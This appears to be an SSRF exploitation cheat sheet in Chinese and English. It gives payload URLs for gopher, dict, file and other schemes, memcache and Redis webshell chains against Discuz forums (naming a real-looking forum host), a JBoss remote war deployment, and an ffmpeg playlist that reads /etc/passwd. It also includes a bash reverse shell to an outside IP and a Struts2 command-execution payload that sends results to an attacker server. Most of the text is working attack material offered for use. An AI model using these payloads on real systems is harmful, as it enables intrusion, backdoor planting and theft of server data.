SSRF利用方法

SSRF PHP function

file_get_contents()
fsockopen()
curl_exec()
readfile()

URL schema support

SFTP

http://safebuff.com/ssrf.php?url=sftp://evil.com:11111/

evil.com:$ nc -v -l 11111
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
SSH-2.0-libssh2_1.4.2

Dict

http://safebuff.com/ssrf.php?dict://attacker:11111/

evil.com:$ nc -v -l 11111
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
CLIENT libcurl 7.40.0

gopher

// http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php
<?php
 header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest');
?>

evil.com:# nc -v -l 12346
Listening on [0.0.0.0] (family 0, port 12346)
Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398)
HI
Multiline
test

TFTP

http://safebuff.com/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

evil.com:# nc -v -u -l 12346
Listening on [0.0.0.0] (family 0, port 12346)
TESTUDPPACKEToctettsize0blksize512timeout6

file

http://safebuff.com/redirect.php?url=file:///etc/passwd

ldap

http://safebuff.com/redirect.php?url=ldap://localhost:11211/%0astats%0aquit

PHP-FPM

PHP-FPM universal SSRF bypass safe_mode/disabled_functions/o exploit

SSRF memcache Getshell

Generate serialize

<?php
 $code=array('global_start'=>'@eval($_REQUEST[\'eval\']);');
 echo serialize($code)."\n".strlen(serialize($code));

Output

a:1:{s:12:"global_start";s:25:"@eval($_REQUEST['eval']);";} //序列化數據
59 //字符串長度

webshell.php

<?php
//gopher可以換成如上其它方式
 header('Location: gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a');
?>

back.php

<?php
 header('Location: gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a');
?>

example Discuz

open the website

http://bbs.biligame.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myvps/webshell.php?logo.jpg[/img]
http://bbs.biligame.com/forum.php?mod=ajax&inajax=yes&action=getthreadtypes

clear data

http://bbs.biligame.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myserver/back.php?logo.jpg[/img]

backdoor url

http://bbs.biligame.com/data/cache/hello.php

SSRF Redis Getshell

Generate serialize

<?php
 $a['output']['preg']['search']['plugins'] = '/.*/e';
 $a['output']['preg']['replace']['plugins'] = '@eval($_POST['c']);';
 $a['rewritestatus']=1;
 $setting = serialize($a);
 echo $setting."\n".strlen($setting);
?>

Output

a:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";a:1:{s:7:"plugins";s:5:"/.*/e";}s:7:"replace";a:1:{s:7:"plugins";s:19:"@eval($_POST["c"]);";}}}s:13:"rewritestatus";i:1;}     //序列化數據
173 //字符串長度

example Discuz

Open website

http://192.168.80.116/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://you-vps-ip/ssrf.php?.jpg[/img]&formhash=818c8f44

Backdoor website

http://192.168.80.116/forum.php?mod=ajax&inajax=yes&action=getthreadtypes

FFmpeg

cat test.jpg

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://example.org/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

subfile

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://localhost/header.m3u8|subfile,,start,0,end,64,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,64,end,128,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,128,end,256,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,256,end,512,,:///etc/passwd
#EXT-X-ENDLIST

PostgreSQL

Exploit

> SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\​' password=1 port=11211 sslmode=disable','select
version();');

MongoDB

Exploit

> db.copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000')
> nc -l 8000 | hexdump -C
> db.copyDatabase(“\nstats\nquit”,’test’,’localhost:11211’)

CouchDB

exploit

http://localhost:5984/_users/_all_docs

HTTP/1.1 200 OK
Server: CouchDB/1.2.0 (Erlang OTP/R15B01)
ETag: "BD1WV12007V05JTG4X6YHIHCA"
Date: Tue, 18 Dec 2012 21:39:59 GMT
Content-Type: text/plain; charset=utf-8
Cache-Control: must-revalidate

{"total_rows":1,"offset":0,"rows":[
{"id":"_design/_auth","key":"_design/_auth","value":{"rev":"1-a8cfb993654bcc635f126724d39eb930"}}
]}

Attacker could also send requests from CouchDB server to intranet by using replication function

POST http://couchdb:5984/_replicate
Content-Type: application/json
Accept: application/json

{
 "source" : "recipes",
 "target" : "http://ssrf-me:11211/recipes",
}

Jboss

Jbosss POC

/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://our_public_internet_server/utils/cmd.war

寫入shell

http://target.com/ueditor/jsp/getRemoteImage.jsp
POST:
 upfile=http://10.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOp%26name=jboss.system%3Aservice%3DMainDeployer%26methodIndex=3%26arg0=http%3A%2F%2F遠端地址%2Fhtml5.war%23.jpg

http://target.com/ueditor/jsp/getRemoteImage.jsp
POST:
 upfile=http://內網IP:8080/html5/023.jsp%23.jpg

reverse shell

bash -i >& /dev/tcp/123.45.67.89/9999 0>&1

Weblogic

gopher.php

<?php
 header("Location:gopher://vps-ip:2333/_test");
?>

vuln website

https://example.com/uddiexplorer/SearchPublicRegistries.jsp
POST:
 operator=http://vps-ip/gopher.php&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

vps

> nc -lvv 2333

Connection from xx.xx.xx.xx port 2333 [tcp/snapp] accepted

Local File Read

http://www.xxx.com/redirect.php?url=file:///etc/passwd
http://www.xxx.com/redirect.php?url=file:///C:/Windows/win.ini

Bool SSRF

Struts2-016 POC

?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
//修改SERVER為你vps地址,返回結果在access.log中查看

SSRF Proxy

SSRF_Proxy

ssrfsocks

 

當我們發現SSRF漏洞后，首先要做的事情就是測試所有可用的URL Schema：

 

 

• file:///
• dict://
• sftp://
• ldap://
• tftp://
• gopher://

 

####file://

 

這種URL Schema可以嘗試從文件系統中獲取文件：

 

http://example.com/ssrf.php?url=file:///etc/passwd

http://example.com/ssrf.php?url=file:///C:/Windows/win.ini

 

如果該服務器阻止對外部站點發送HTTP請求，或啟用了白名單防護機制，只需使用如下所示的URL Schema就可以繞過這些限制：

 

####dict://

 

這種URL Scheme能夠引用允許通過DICT協議使用的定義或單詞列表：

 

http://example.com/ssrf.php?dict://evil.com:1337/

 

evil.com:$ nc -lvp 1337

Connection from [192.168.0.12] port 1337[tcp/*] accepted (family 2, sport 31126)

CLIENT libcurl 7.40.0

 

####sftp://

 

在這里，Sftp代表SSH文件傳輸協議（SSH File Transfer Protocol），或安全文件傳輸協議（Secure File Transfer Protocol），這是一種與SSH打包在一起的單獨協議，它運行在安全連接上，並以類似的方式進行工作。

 

http://example.com/ssrf.php?url=sftp://evil.com:1337/

 

evil.com:$ nc -lvp 1337

Connection from [192.168.0.12] port 1337[tcp/*] accepted (family 2, sport 37146)

SSH-2.0-libssh2_1.4.2

 

####ldap://或ldaps:// 或ldapi://

 

LDAP代表輕量級目錄訪問協議。它是IP網絡上的一種用於管理和訪問分布式目錄信息服務的應用程序協議。

 

http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquit

http://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquit

http://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit

 

####tftp://

 

TFTP（Trivial File Transfer Protocol,簡單文件傳輸協議）是一種簡單的基於lockstep機制的文件傳輸協議，它允許客戶端從遠程主機獲取文件或將文件上傳至遠程主機。

 

http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET

 

evil.com:# nc -lvup 1337

Listening on [0.0.0.0] (family 0, port1337)

TESTUDPPACKEToctettsize0blksize512timeout3

 

####gopher://

 

Gopher是一種分布式文檔傳遞服務。利用該服務，用戶可以無縫地瀏覽、搜索和檢索駐留在不同位置的信息。

 

http://example.com/ssrf.php?url=http://attacker.com/gopher.php

 

gopher.php (host it on acttacker.com):-

<?php

  header('Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest');

?>

 

evil.com:# nc -lvp 1337

Listening on [0.0.0.0] (family 0, port1337)

Connection from [192.168.0.12] port 1337[tcp/*] accepted (family 2, sport 49398)

Hi

ssrf

test

 

有關更多信息，請參見此處。

 

###掃描內部網絡和端口

 

如果攻擊對象在局域網中運行一些服務器（如Kibana、Elastic Search、MongoDB，等等），但是我們卻無法直接從Internet訪問它們，因為防火牆會阻止這些訪問，那么，我們該如何是好呢？

 

別急，我們可以利用SSRF漏洞來訪問它們。

 

攻擊者可以運行內部IP並進行端口掃描，從而了解有關目標的更多信息，並將其用於進一步攻擊。

 

有時，這甚至會導致遠程代碼執行攻擊。

 

示例：假設攻擊者發現了一台運行過時軟件的內部主機，該主機存在已經公開曝光的RCE漏洞，這樣的話，攻擊者就可以利用該漏洞來執行代碼。當然，這種方式也適用於其他類型的漏洞。